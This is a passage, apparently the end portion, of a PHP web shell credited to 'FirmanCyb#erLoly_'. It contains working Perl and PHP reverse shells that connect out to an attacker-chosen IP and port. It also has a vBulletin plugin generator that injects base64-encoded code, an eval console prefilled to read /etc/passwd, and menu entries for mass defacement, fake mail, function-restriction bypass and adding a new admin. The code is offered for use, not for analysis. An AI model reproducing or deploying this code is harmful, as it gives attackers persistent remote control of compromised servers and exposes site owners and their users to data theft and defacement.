2989}
2990else{
2991$code=$_POST['code'];
2992}
2993$code = 'base64_decode('.$code.')';
2994$head = '<?xml version="1.0" encoding="ISO-8859-1"?>
2995
2996<plugins>
2997 <plugin active="1" product="vbulletin">
2998 <title>vBulletin</title>
2999 <hookname>init_startup</hookname>
3000 <phpcode><![CDATA[if (strpos($_SERVER["PHP_SELF"],"subscriptions.php")) {';
3001$foot = 'exit;
3002}]]></phpcode>
3003 </plugin>
3004</plugins>';
3005echo"<br/><center><textarea rows='10' name='users' cols='80' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>";
3006echo $head.'base64_decode(\''.base64_encode($code).'\');'.$foot;
3007echo '</textarea></center><br>';
3008}
3009echo '</center></div>';
3010
3011 }
3012 if($action=="bc"){
3013 echo "<style>#bc{background: #A81F1F}</style>";
3014
3015$back_connect_p='#!/usr/bin/perl
3016use Socket;
3017$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
3018$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
3019$proto=getprotobyname("tcp");
3020socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
3021connect(SOCKET, $paddr) || die("Error: $!\n");
3022open(STDIN, ">&SOCKET");
3023open(STDOUT, ">&SOCKET");
3024open(STDERR, ">&SOCKET");
3025system("/bin/sh -i");
3026close(STDIN);
3027close(STDOUT);
3028close(STDERR);
3029';
3030
3031echo "<center><h3><span>Back Connect</span></h3>";
3032echo "<form method=\"post\" action=\"?action=bc&dir=$path#down\">
3033<input type=\"hidden\" name=\"type\" value=\"perl\">
3034<span>PERL BACK CONNECT<br></span><br><b>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'>
3035Port: <input type='number' name='port' value='443' min='1' max='65535'><input type=submit name=bc value='>>'></form></b>";
3036
3037
3038echo "<br><form method=\"post\" action=\"?action=bc&dir=$path#down\">
3039<input type=\"hidden\" name=\"type\" value=\"php\">
3040<span>PHP BACK CONNECT<br></span><br><b>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'>
3041Port: <input type='number' name='port' value='443' min='1' max='65535'> <input type=submit name=bc value='>>'></form><br>";
3042
3043if(isset($_POST['type'])) {
3044function cf($f,$t) {
3045$w = @fopen($f,"w") or @function_exists('file_put_contents');
3046if($w){
3047@fwrite($w,$t);
3048@fclose($w);
3049}
3050}
3051
3052if($_POST['type'] == 'perl') {
3053cf("/tmp/bc.pl",$back_connect_p);
3054$out = extension("perl /tmp/bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
3055echo "<span style=\"color:green\"><br>Successfully opened reverse shell to ".htmlspecialchars($_POST['server']).":".htmlspecialchars($_POST['port'])."<br>Connecting...[Perl]</span>";
3056@unlink("/tmp/bc.pl");
3057}
3058
3059if($_POST['type']=='php')
3060{
3061@set_time_limit (0);
3062$ip = htmlspecialchars($_POST['server']);
3063$port = htmlspecialchars($_POST['port']);
3064$chunk_size = 1400;
3065$write_a = null;
3066$error_a = null;
3067$shell = 'uname -a; w; id; /bin/sh -i';
3068$daemon = 0;
3069$debug = 0;
3070if (function_exists('pcntl_fork')) {
3071$pid = pcntl_fork();
3072if ($pid == -1) {
3073echo "Cant fork!<br>";
3074exit(1);
3075}
3076if ($pid) {
3077exit(0);
3078}
3079if (posix_setsid() == -1) {
3080echo "<span style=\"color:red\"><br>Error: Can't setsid()</span><br>";
3081exit(1);
3082}
3083$daemon = 1;
3084} else {
3085echo "<span style=\"color:red\"><br>WARNING: Failed to daemonise. This is quite common and not fatal<br></span>";
3086}
3087chdir(htmlspecialchars($GLOBALS['path']));
3088umask(0);
3089$sock = fsockopen($ip, $port, $errno, $errstr, 30);
3090if (!$sock) {
3091echo "$errstr ($errno)";
3092exit(1);
3093}
3094$descriptorspec = array(
30950 => array("pipe", "r"),
30961 => array("pipe", "w"),
30972 => array("pipe", "w")
3098);
3099$process = proc_open($shell, $descriptorspec, $pipes);
3100if (!is_resource($process)) {
3101echo "ERROR: Can't spawn shell<br>";
3102exit(1);
3103}
3104@stream_set_blocking($pipes[0], 0);
3105@stream_set_blocking($pipes[1], 0);
3106@stream_set_blocking($pipes[2], 0);
3107@stream_set_blocking($sock, 0);
3108echo "<span style=\"color:green\"><br>Successfully opened reverse shell to $ip:$port [Php]</span><br>";
3109while (1) {
3110if (feof($sock)) {
3111echo "<span style=\"color:red\"><br>ERROR: Shell connection terminated</span><br>";
3112break;
3113}
3114if (feof($pipes[1])) {
3115echo "<span style=\"color:red\"><br>ERROR: Shell process terminated</span><br>";
3116break;
3117}
3118$read_a = array($sock, $pipes[1], $pipes[2]);
3119$num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null);
3120if (in_array($sock, $read_a)) {
3121if ($debug) echo "SOCK READ<br>";
3122$input=fread($sock, $chunk_size);
3123if ($debug) echo "SOCK: $input<br>";
3124fwrite($pipes[0], $input);
3125}
3126if (in_array($pipes[1], $read_a)) {
3127if ($debug) echo "STDOUT READ<br>";
3128$input = fread($pipes[1], $chunk_size);
3129if ($debug) echo "STDOUT: $input<br>";
3130fwrite($sock, $input);
3131}
3132if (in_array($pipes[2], $read_a)) {
3133if ($debug) echo "STDERR READ<br>";
3134$input = fread($pipes[2], $chunk_size);
3135if ($debug) echo "STDERR: $input<br>";
3136fwrite($sock, $input);
3137}
3138}
3139fclose($sock);
3140fclose($pipes[0]);
3141fclose($pipes[1]);
3142fclose($pipes[2]);
3143proc_close($process);
3144echo "</pre>";
3145}
3146}
3147
3148 }
3149
3150 if($action=="othertools"){
3151 echo "<style>#othertools{background: #A81F1F}</style>";
3152 ?>
3153 <table>
3154 <tr>
3155 <td><a href="?action=zoneh&dir=<?php echo $path;?>" title="ZONE-H MASS DEFACE POSTER"><input type="button" value="ZONE-H" onclick=""></a><td>
3156 <td><a href="?action=mass&dir=<?php echo $path;?>"><input type="button" value="MASS DEFACER" onclick=""></a><td>
3157 <td><a href="?action=zipper&dir=<?php echo $path;?>"><input type="button" value="ZIPPER" onclick=""></a><td>
3158 <td><a href="?action=fakemail&dir=<?php echo $path;?>"><input type="button" value="FAKE MAIL" onclick=""></a><td>
3159 <td><a href="?action=php2xml&dir=<?php echo $path;?>"><input type="button" value="PHP TO XML" onclick=""></a><td>
3160 <td><a href="?action=disfunc&dir=<?php echo $path;?>"><input type="button" value="BYPASSER" onclick=""></a><td>
3161 <td><a href="?action=pwchanger&dir=<?php echo $path;?>"><input type="button" value="ADD NEW ADMIN" onclick=""></a><td>
3162 <td><a href="?action=cloudflare&dir=<?php echo $path;?>"><input type="button" value="CLOUD FLARE BYPASSER" onclick=""></a><td>
3163 <td><a href="?action=info&dir=<?php echo $path;?>"><input type="button" value="PHP INFO" onclick=""></a><td>
3164 </tr>
3165
3166 <?php
3167 }
3168
3169 if($action=="eval"){
3170 echo "<style>#eval{background: #A81F1F}</style>";
3171 ?><center>
3172 <span style="font-size:20px;"><b>PHP Eval</b></span>
3173 <a name="down"></a><form action="?action=eval&dir=<?php echo $path;?>#down" method="post">
3174<table><tr><td>
3175
3176<textarea name="eval" style="width:1000px;height:300px;border: 2px solid #CE3F3F;">
3177<?php
3178if(isset($_POST['submiteval'])) {
3179 echo eval(magicboom($_POST['eval']));}
3180 else{
3181 echo "echo file_get_contents('/etc/passwd');";
3182}
3183?>
3184</textarea>
3185</td></tr>
3186<tr><td>
3187<input type="submit" value="Run !" name="submiteval" />
3188</td></tr>
3189
3190</table></form>
3191</center>
3192
3193 <?php
3194 }
3195 if($action=="logout"){
3196 ?>
3197 <form action="?action=logout" method="post">
3198 <span>Sayonara senpai !! watashi sukidayo.!!</span>
3199 <input type="submit" value="Yes" name="accept" style="cursor: pointer"/>
3200 <input type="button" value="No" onclick="window.location.href='?action=explorer'" style="cursor: pointer">
3201 </form>
3202
3203 <?php
3204if(isset($_POST['accept']) && $_POST['accept'] != "" && $_POST['accept']=="Yes"){
3205unset($_SESSION[$_SERVER['HTTP_HOST']]);
3206header("location: ?action=explorer");
3207 }
3208 }
3209}
3210//Coded By FirmanCyb#erLoly_
3211?>
3212 <div class="clear">
3213 </div>
3214 </div>
3215
3216 </div>
3217 </body>
3218</html>